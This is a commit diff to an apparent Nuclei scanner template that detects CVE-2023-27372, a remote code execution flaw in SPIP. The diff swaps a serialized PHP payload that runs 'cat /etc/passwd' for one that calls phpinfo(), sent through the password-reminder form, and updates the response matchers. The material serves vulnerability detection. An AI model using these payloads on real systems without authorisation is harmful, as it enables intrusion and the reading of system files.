payload updation to detect both windows and linux

2023-06-22 12:32:57 +05:30 · 2023-06-22 12:32:57 +05:30 · 77b86dfc49
parent 07905a3aeb
commit 77b86dfc49
1 changed files with 17 additions and 9 deletions
--- a/http/cves/2023/CVE-2023-27372.yaml
+++ b/http/cves/2023/CVE-2023-27372.yaml
@ -2,7 +2,7 @@ id: CVE-2023-27372

 info:
  name: SPIP - Remote Command Execution
-  author: DhiyaneshDK
+  author: DhiyaneshDK,nuts7
  severity: critical
  description: |
    SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.
@ -31,19 +31,21 @@ http:
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

-        page=spip_pass&formulaire_action=oubli&formulaire_action_args={{csrf}}&oubli=s%3A35%3A%22%3C%3Fphp+system%28%27cat+%2Fetc%2Fpasswd%27%29%3B+%3F%3E%22%3B
+        page=spip_pass&formulaire_action=oubli&formulaire_action_args={{csrf}}&oubli=s:19:"<?php phpinfo(); ?>";

    matchers-condition: and
    matchers:
-      - type: regex
-        part: body_2
-        regex:
-          - "root:.*:0:0:"
-
      - type: word
-        part: header_2
+        part: body_2
        words:
-          - text/html
+          - "PHP Extension"
+          - "PHP Version"
+          - "<!DOCTYPE html"
+        condition: and
+
+      - type: status
+        status:
+          - 200

    extractors:
      - type: regex
@ -53,3 +55,9 @@ http:
        part: body_1
        regex:
          - "name='formulaire_action_args'[^>]*value='([^']*)'"
+
+      - type: regex
+        part: body_2
+        group: 1
+        regex:
+          - '>PHP Version <\/td><td class="v">([0-9.]+)'